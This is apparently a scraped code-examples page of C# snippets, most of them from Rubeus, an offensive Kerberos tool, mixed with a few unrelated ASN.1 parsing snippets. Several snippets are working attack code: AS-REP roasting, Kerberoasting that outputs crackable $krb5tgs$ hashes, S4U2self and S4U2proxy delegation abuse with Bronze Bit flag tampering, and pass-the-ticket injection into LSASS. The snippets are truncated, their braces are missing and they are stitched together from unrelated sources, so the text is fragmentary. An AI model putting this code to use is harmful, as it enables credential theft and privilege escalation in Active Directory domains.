Exemple #1
        public AsnElt Encode()
            // authenticator [4] EncryptedData
            if (null == key)
                Console.WriteLine("  [X] A key for the authenticator is needed to build an AP-REQ");
            // create the EncryptedData structure to hold the authenticator bytes
            EncryptedData authenticatorEncryptedData = new EncryptedData()
                etype  = (int)enctype,
                cipher = Crypto.KerberosEncrypt(enctype, keyUsage, key,

            // AP-REQ ::= [APPLICATION 14]
            // put it all together and tag it with 14
            return(AsnElt.MakeImplicit(AsnElt.APPLICATION, 14,
                                               // pvno [0] INTEGER (5)
                                               AsnElt.MakeImplicit(AsnElt.CONTEXT, 0,
                                               // msg-type [1] INTEGER (14)
                                               AsnElt.MakeImplicit(AsnElt.CONTEXT, 1,
                                               // ap-options [2] APOptions
                                               AsnElt.MakeImplicit(AsnElt.CONTEXT, 2,
                                               // ticket [3] Ticket
                                               AsnElt.MakeImplicit(AsnElt.CONTEXT, 3,
                                               AsnElt.MakeImplicit(AsnElt.CONTEXT, 4,
Exemple #2
        public static bool NoPreAuthTGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string domainController, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false)
            string dcIP = Networking.GetDCIP(domainController, true, domain);

            if (String.IsNullOrEmpty(dcIP))

            AS_REQ NoPreAuthASREQ = AS_REQ.NewASReq(userName, domain, etype, true);

            byte[] reqBytes = NoPreAuthASREQ.Encode().Encode();

            byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);

            if (response == null)

            // decode the supplied bytes to an AsnElt object
            AsnElt responseAsn = AsnElt.Decode(response);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
                Console.WriteLine("[-] AS-REQ w/o preauth successful! {0} has pre-authentication disabled!", userName);

                byte[] kirbiBytes = HandleASREP(responseAsn, etype, keyString, outfile, ptt, luid, describe, verbose);


Exemple #3
        public AsnElt Encode()
            List <AsnElt> allNodes = new List <AsnElt>();

            // userName[0] PrincipalName
                AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, userName.Encode()));

            // userRealm[1] Realm
                AsnElt.MakeImplicit(AsnElt.CONTEXT, 1,
                                        AsnElt.MakeImplicit(AsnElt.UNIVERSAL, AsnElt.GeneralString,
                                                            AsnElt.MakeString(AsnElt.IA5String, userRealm)))));

            // cksum[2] Checksum
                AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, cksum.Encode()));

            // auth-package[3] KerberosString
                AsnElt.MakeImplicit(AsnElt.CONTEXT, 3,
                                        AsnElt.MakeImplicit(AsnElt.UNIVERSAL, AsnElt.GeneralString,
                                                            AsnElt.MakeString(AsnElt.IA5String, auth_package)))));

            // package it all up
            AsnElt seq = AsnElt.MakeSequence(allNodes.ToArray());

            // tag the final total
            //AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { seq });
            //final = AsnElt.MakeImplicit(AsnElt.APPLICATION, 2, final);

Exemple #4
        public PA_DATA(AsnElt body)
            //if (body.Sub.Length != 2)
            //    throw new System.Exception("PA-DATA should contain two elements");

            //Console.WriteLine("tag: {0}", body.Sub[0].Sub[1].TagString);
            type = (Interop.PADATA_TYPE)body.Sub[0].Sub[0].GetInteger();
            byte[] valueBytes = body.Sub[1].Sub[0].GetOctetString();

            if (type == Interop.PADATA_TYPE.PA_PAC_REQUEST)
                value = new KERB_PA_PAC_REQUEST(AsnElt.Decode(body.Sub[1].Sub[0].CopyValue()));
            else if (type == Interop.PADATA_TYPE.ENC_TIMESTAMP)
                // TODO: parse PA-ENC-TIMESTAMP
            else if (type == Interop.PADATA_TYPE.AP_REQ)
                // TODO: parse AP_REQ
Exemple #5
        public static byte[] AppleAttestationExtensionBytes(X509ExtensionCollection exts)
            foreach (var ext in exts)
                if (ext.Oid.Value.Equals("1.2.840.113635.100.8.2")) // AppleAttestationRecordOid
                    var appleAttestationASN = AsnElt.Decode(ext.RawData);

                    var sequence = appleAttestationASN.GetSub(0);

                    var context = sequence.GetSub(0);

Exemple #6
        public EncryptedData(AsnElt body)
            foreach (AsnElt s in body.EnumerateElements())
                AsnElt firstElement = s.FirstElement;
                switch (s.TagValue)
                case 0:
                    etype = Convert.ToInt32(firstElement.GetInteger());

                case 1:
                    kvno = Convert.ToUInt32(firstElement.GetInteger());

                case 2:
                    cipher = firstElement.GetOctetString();

Exemple #7
        public static bool FindAllApplicationsField(byte[] attExtBytes)
            // https://developer.android.com/training/articles/security-key-attestation#certificate_schema
            // check both software and tee enforced AuthorizationList objects for presense of "allApplications" tag, number 600
            var keyDescription = AsnElt.Decode(attExtBytes);

            var softwareEnforced = keyDescription.GetSub(6).Sub;

            foreach (AsnElt s in softwareEnforced)
                switch (s.TagValue)
                case 600:


            var teeEnforced = keyDescription.GetSub(7).Sub;

            foreach (AsnElt s in teeEnforced)
                switch (s.TagValue)
                case 600:


Exemple #8
        public AsnElt Encode()
            SignedCms signed = new SignedCms(
                new ContentInfo(

            var signer = new CmsSigner(PKCert);

            if (!VerifyCerts)
                signer.IncludeOption = X509IncludeOption.EndCertOnly; // only the end certificate is included in the X.509 chain information.
            signed.ComputeSignature(signer, silent: false);

            return(AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
                AsnElt.Make(AsnElt.CONTEXT, 0, new AsnElt[] {
Exemple #9
        public bool VerifyTSXClient(byte[] OnlineKey, byte[] EncryptedTS)
            byte[] dec_ts = KerberosCrypto.KerberosDecrypt(Interop.KERB_ETYPE.rc4_hmac,
                                                           Interop.KRB_KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP, OnlineKey, EncryptedTS);

            Logger.Info(BitConverter.ToString(dec_ts).Replace("-", ""));

            AsnElt timestamp_encoded = AsnElt.Decode(dec_ts, false);

            DateTime timestamp = timestamp_encoded.Sub[0].Sub[0].GetTime(24);
            long     usec      = timestamp_encoded.Sub[1].Sub[0].GetInteger();

            if (timestamp != null && usec != null)
                Logger.Info("Successfully decrypted & decoded timestamp/usec");
                Logger.Info(timestamp + " : " + usec);

Exemple #10
        // to perform the 2 S4U2Proxy requests
        private static KRB_CRED CrossDomainS4U2Proxy(string userName, string targetUser, string targetSPN, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, Ticket tgs = null, bool cross = true, bool ptt = false, string createnetonly = null, bool show = false)
            string dcIP = Networking.GetDCIP(targetDomainController);

            if (String.IsNullOrEmpty(dcIP))

            string domain       = userName.Split('@')[1];
            string targetDomain = targetUser.Split('@')[1];

            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}' on {1}", targetSPN, targetDomainController);
            TGS_REQ s4u2proxyReq = new TGS_REQ(cname: false);
            PA_DATA padata       = new PA_DATA(domain, userName.Split('@')[0], ticket, clientKey, etype);

            PA_DATA pac_options = new PA_DATA(false, false, false, true);


            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CONSTRAINED_DELEGATION;
            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;
            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;

            if (cross)
                s4u2proxyReq.req_body.realm = targetDomain;
                s4u2proxyReq.req_body.realm = domain;

            string[] parts      = targetSPN.Split('/');
            string   serverName = parts[parts.Length - 1];

            s4u2proxyReq.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
            foreach (string part in parts)

            // supported encryption types

            // add in the ticket from the S4U2self response

            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();

            Console.WriteLine("[*] Sending S4U2proxy request");
            byte[] response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
            if (response2 == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response2, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] S4U2proxy success!");

                // parse the response to an TGS-REP
                TGS_REP rep2 = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes2   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
                AsnElt        ae2         = AsnElt.Decode(outBytes2, false);
                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);

                // now build the final KRB-CRED structure, no alternate snames
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart2.key.keytype;
                info.key.keyvalue = encRepPart2.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart2.realm;

                // [2] pname (user)
                info.pname.name_type   = rep2.cname.name_type;
                info.pname.name_string = rep2.cname.name_string;

                // [3] flags
                info.flags = encRepPart2.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart2.starttime;

                // [6] endtime
                info.endtime = encRepPart2.endtime;

                // [7] renew-till
                info.renew_till = encRepPart2.renew_till;

                // [8] srealm
                info.srealm = encRepPart2.realm;

                // [9] sname
                info.sname.name_type   = encRepPart2.sname.name_type;
                info.sname.name_string = encRepPart2.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);

                if (Rubeus.Program.wrapTickets)
                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                    Console.WriteLine("      {0}", kirbiString);

                if (ptt && cross)
                    // pass-the-ticket -> import into LSASS
                    ImportTicket(kirbiBytes, createnetonly, show);

                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

Exemple #11
        private static KRB_CRED S4U2Self(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", bool self = false, bool opsec = false, bool bronzebit = false, string keyString = "", Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial, string proxyUrl = null, string createnetonly = null, bool show = false)
            // extract out the info needed for the TGS-REQ/S4U2Self execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            Console.WriteLine("[*] Building S4U2self request for: '{0}@{1}'", userName, domain);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, userName, ticket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, false, targetUser, false, false, opsec);

            byte[] response = null;

            if (String.IsNullOrEmpty(proxyUrl))
                string dcIP = Networking.GetDCIP(domainController);
                if (String.IsNullOrEmpty(dcIP))
                Console.WriteLine("[*] Sending S4U2self request to {0}:88", dcIP);
                response = Networking.SendBytes(dcIP, 88, tgsBytes);
                Console.WriteLine("[*] Sending S4U2self request via KDC proxy: {0}", proxyUrl);
                KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(tgsBytes);
                message.target_domain = domain;
                response = Networking.MakeProxyRequest(proxyUrl, message);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] S4U2self success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // if we want to use this s4u2self ticket for authentication, change the sname
                if (!String.IsNullOrEmpty(altService) && self)
                    rep.ticket.sname.name_string[0] = altService.Split('/')[0];

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;
                if (bronzebit && !String.IsNullOrEmpty(keyString))
                    Console.WriteLine("[*] Bronze Bit flag passed, flipping forwardable flag on. Original flags: {0}", info.flags);
                    info.flags |= Interop.TicketFlags.forwardable;

                    // get user longterm key from keyString
                    byte[] key = Helpers.StringToByteArray(keyString);

                    // decrypt and decode ticket encpart
                    var decTicketPart = rep.ticket.Decrypt(key, null, true);

                    // modify flags
                    decTicketPart.flags |= Interop.TicketFlags.forwardable;

                    // encode and encrypt ticket encpart
                    byte[] encTicketData = decTicketPart.Encode().Encode();
                    byte[] encTicketPart = Crypto.KerberosEncrypt((Interop.KERB_ETYPE)rep.ticket.enc_part.etype, Interop.KRB_KEY_USAGE_AS_REP_TGS_REP, key, encTicketData);
                    rep.ticket.enc_part = new EncryptedData(rep.ticket.enc_part.etype, encTicketPart, rep.ticket.enc_part.kvno);
                    Console.WriteLine("[*] Flags changed to: {0}", info.flags);

                // add the ticket

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // if we want to use the s4u2self change the sname here too
                if (!String.IsNullOrEmpty(altService) && self)
                    Console.WriteLine("[*] Substituting alternative service name '{0}'", altService);
                    info.sname.name_string[0] = altService.Split('/')[0];

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] Got a TGS for '{0}' to '{1}@{2}'", info.pname.name_string[0], info.sname.name_string[0], info.srealm);
                Console.WriteLine("[*] base64(ticket.kirbi):\r\n");

                if (Rubeus.Program.wrapTickets)
                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                    Console.WriteLine("      {0}", kirbiString);


                if (!String.IsNullOrEmpty(outfile))
                    string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{info.pname.name_string[0]}_to_{info.sname.name_string[0]}@{info.srealm}{Helpers.GetExtensionFromFilename(outfile)}";
                    filename = Helpers.MakeValidFileName(filename);
                    if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                        Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                if (ptt && self)
                    // pass-the-ticket -> import into LSASS
                    ImportTicket(kirbiBytes, createnetonly, show);

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

Exemple #12
 public AS_REP(AsnElt asn_AS_REP)
Exemple #13
        public static void GetTGSRepHash(string spn, string userName = "******", string distinguishedName = "", System.Net.NetworkCredential cred = null, string outFile = "", bool simpleOutput = false)
            // use the System.IdentityModel.Tokens.KerberosRequestorSecurityToken approach

            string domain = "DOMAIN";

            if (Regex.IsMatch(distinguishedName, "^CN=.*", RegexOptions.IgnoreCase))
                // extract the domain name from the distinguishedname
                Match  dnMatch  = Regex.Match(distinguishedName, "(?<Domain>DC=.*)", RegexOptions.IgnoreCase);
                string domainDN = dnMatch.Groups["Domain"].ToString();
                domain = domainDN.Replace("DC=", "").Replace(',', '.');

                // the System.IdentityModel.Tokens.KerberosRequestorSecurityToken approach and extraction of the AP-REQ from the
                //  GetRequest() stream was constributed to PowerView by @machosec
                System.IdentityModel.Tokens.KerberosRequestorSecurityToken ticket;
                if (cred != null)
                    ticket = new System.IdentityModel.Tokens.KerberosRequestorSecurityToken(spn, TokenImpersonationLevel.Impersonation, cred, Guid.NewGuid().ToString());
                    ticket = new System.IdentityModel.Tokens.KerberosRequestorSecurityToken(spn);
                byte[] requestBytes = ticket.GetRequest();

                if (!((requestBytes[15] == 1) && (requestBytes[16] == 0)))
                    Console.WriteLine("\r\n[X] GSSAPI inner token is not an AP_REQ.\r\n");

                // ignore the GSSAPI frame
                byte[] apReqBytes = new byte[requestBytes.Length - 17];
                Array.Copy(requestBytes, 17, apReqBytes, 0, requestBytes.Length - 17);

                AsnElt apRep = AsnElt.Decode(apReqBytes);

                if (apRep.TagValue != 14)
                    Console.WriteLine("\r\n[X] Incorrect ASN application tag.  Expected 14, but got {0}.\r\n", apRep.TagValue);

                long encType = 0;

                foreach (AsnElt elem in apRep.Sub[0].Sub)
                    if (elem.TagValue == 3)
                        foreach (AsnElt elem2 in elem.Sub[0].Sub[0].Sub)
                            if (elem2.TagValue == 3)
                                foreach (AsnElt elem3 in elem2.Sub[0].Sub)
                                    if (elem3.TagValue == 0)
                                        encType = elem3.Sub[0].GetInteger();

                                    if (elem3.TagValue == 2)
                                        byte[] cipherTextBytes = elem3.Sub[0].GetOctetString();
                                        string cipherText      = BitConverter.ToString(cipherTextBytes).Replace("-", "");
                                        string hash            = "";

                                        if ((encType == 18) || (encType == 17))
                                            //Ensure checksum is extracted from the end for aes keys
                                            int checksumStart = cipherText.Length - 24;
                                            //Enclose SPN in *s rather than username, realm and SPN. This doesn't impact cracking, but might affect loading into hashcat.
                                            hash = String.Format("$krb5tgs${0}${1}${2}$*{3}*${4}${5}", encType, userName, domain, spn, cipherText.Substring(checksumStart), cipherText.Substring(0, checksumStart));
                                        //if encType==23
                                            hash = String.Format("$krb5tgs${0}$*{1}${2}${3}*${4}${5}", encType, userName, domain, spn, cipherText.Substring(0, 32), cipherText.Substring(32));

                                        if (!String.IsNullOrEmpty(outFile))
                                            string outFilePath = Path.GetFullPath(outFile);
                                                File.AppendAllText(outFilePath, hash + Environment.NewLine);
                                            catch (Exception e)
                                                Console.WriteLine("Exception: {0}", e.Message);
                                            Console.WriteLine("[*] Hash written to {0}\r\n", outFilePath);
                                        else if (simpleOutput)
                                            if (Rubeus.Program.wrapTickets)
                                                bool header = false;
                                                foreach (string line in Helpers.Split(hash, 80))
                                                    if (!header)
                                                        Console.WriteLine("[*] Hash                   : {0}", line);
                                                        Console.WriteLine("                             {0}", line);
                                                    header = true;
                                                Console.WriteLine("[*] Hash                   : {0}", hash);
            catch (Exception ex)
                Console.WriteLine("\r\n [X] Error during request for SPN {0} : {1}\r\n", spn, ex.InnerException.Message);
Exemple #14
        public AsnElt Encode()
            List <AsnElt> asnElements = new List <AsnElt>();

            // key             [0] EncryptionKey
            AsnElt keyAsn = key.Encode();

            keyAsn = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, keyAsn);

            // prealm          [1] Realm OPTIONAL
            if (!String.IsNullOrEmpty(prealm))
                AsnElt prealmAsn = AsnElt.MakeString(AsnElt.IA5String, prealm);
                prealmAsn = AsnElt.MakeImplicit(AsnElt.UNIVERSAL, AsnElt.GeneralString, prealmAsn);
                AsnElt prealmAsnSeq = AsnElt.Make(AsnElt.SEQUENCE, prealmAsn);
                prealmAsnSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, prealmAsnSeq);


            // pname           [2] PrincipalName OPTIONAL
            if ((pname.name_string != null) && (pname.name_string.Count != 0) && (!String.IsNullOrEmpty(pname.name_string[0])))
                AsnElt pnameAsn = pname.Encode();
                pnameAsn = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, pnameAsn);

            // pname           [2] PrincipalName OPTIONAL
            byte[] flagBytes = BitConverter.GetBytes((UInt32)flags);
            if (BitConverter.IsLittleEndian)
            AsnElt flagBytesAsn = AsnElt.MakeBitString(flagBytes);
            AsnElt flagBytesSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { flagBytesAsn });

            flagBytesSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 3, flagBytesSeq);

            // authtime        [4] KerberosTime OPTIONAL
            if ((authtime != null) && (authtime != DateTime.MinValue))
                AsnElt authtimeAsn = AsnElt.MakeString(AsnElt.GeneralizedTime, authtime.ToString("yyyyMMddHHmmssZ"));
                AsnElt authtimeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { authtimeAsn });
                authtimeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 4, authtimeSeq);

            // starttime       [5] KerberosTime OPTIONAL
            if ((starttime != null) && (starttime != DateTime.MinValue))
                AsnElt starttimeAsn = AsnElt.MakeString(AsnElt.GeneralizedTime, starttime.ToString("yyyyMMddHHmmssZ"));
                AsnElt starttimeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { starttimeAsn });
                starttimeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 5, starttimeSeq);

            // endtime         [6] KerberosTime OPTIONAL
            if ((endtime != null) && (endtime != DateTime.MinValue))
                AsnElt endtimeAsn = AsnElt.MakeString(AsnElt.GeneralizedTime, endtime.ToString("yyyyMMddHHmmssZ"));
                AsnElt endtimeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { endtimeAsn });
                endtimeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 6, endtimeSeq);

            // renew-till      [7] KerberosTime OPTIONAL
            if ((renew_till != null) && (renew_till != DateTime.MinValue))
                AsnElt renew_tillAsn = AsnElt.MakeString(AsnElt.GeneralizedTime, renew_till.ToString("yyyyMMddHHmmssZ"));
                AsnElt renew_tillSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { renew_tillAsn });
                renew_tillSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 7, renew_tillSeq);

            // srealm          [8] Realm OPTIONAL
            if (!String.IsNullOrEmpty(srealm))
                AsnElt srealmAsn = AsnElt.MakeString(AsnElt.IA5String, srealm);
                srealmAsn = AsnElt.MakeImplicit(AsnElt.UNIVERSAL, AsnElt.GeneralString, srealmAsn);
                AsnElt srealmAsnSeq = AsnElt.Make(AsnElt.SEQUENCE, srealmAsn);
                srealmAsnSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 8, srealmAsnSeq);

            // sname           [9] PrincipalName OPTIONAL
            if ((sname.name_string != null) && (sname.name_string.Count != 0) && (!String.IsNullOrEmpty(sname.name_string[0])))
                AsnElt pnameAsn = sname.Encode();
                pnameAsn = AsnElt.MakeImplicit(AsnElt.CONTEXT, 9, pnameAsn);

            // caddr           [10] HostAddresses OPTIONAL

            AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, asnElements.ToArray());

Exemple #15
        public static byte[] TGS(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false)
            string dcIP = Networking.GetDCIP(domainController, display);

            if (String.IsNullOrEmpty(dcIP))

            if (display)
                if (requestEType == Interop.KERB_ETYPE.subkey_keymaterial)
                    Console.WriteLine("[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket", requestEType);
                    Console.WriteLine("[*] Requesting '{0}' etype for the service ticket", requestEType);

                Console.WriteLine("[*] Building TGS-REQ request for: '{0}'", service);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, service, providedTicket, clientKey, paEType, requestEType, false, "", enterprise, roast);

            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                if (display)
                    Console.WriteLine("[+] TGS request successful!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);

                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(paEType, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = rep.crealm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());

                if (display)
                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                    if (Rubeus.Program.wrapTickets)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", kirbiString);

                    KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

                if (!String.IsNullOrEmpty(outfile))
                    outfile = Helpers.MakeValidFileName(outfile);
                    if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
                        if (display)
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
Exemple #16
        public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool ptt, string domainController = "", uint luid = 0)
            Console.WriteLine("[*] Action: Ask TGT\r\n");

            Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);

            if (luid != 0)
                Console.WriteLine("[*] Target LUID : {0}", luid);

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);

            byte[] reqBytes = AS_REQ.NewASReq(userName, domain, keyString, etype);

            byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 11)
                Console.WriteLine("[+] TGT request successful!");

                // parse the response to an AS-REP
                AS_REP rep = new AS_REP(responseAsn);

                // convert the key string to bytes
                byte[] key = Helpers.StringToByteArray(keyString);

                // decrypt the enc_part containing the session key/etc.
                // TODO: error checking on the decryption "failing"...
                byte[] outBytes;

                if (etype == Interop.KERB_ETYPE.rc4_hmac)
                    // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
                    // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                    Console.WriteLine("\r\n[X] Encryption type \"{0}\" not currently supported", etype);

                AsnElt ae = AsnElt.Decode(outBytes, false);

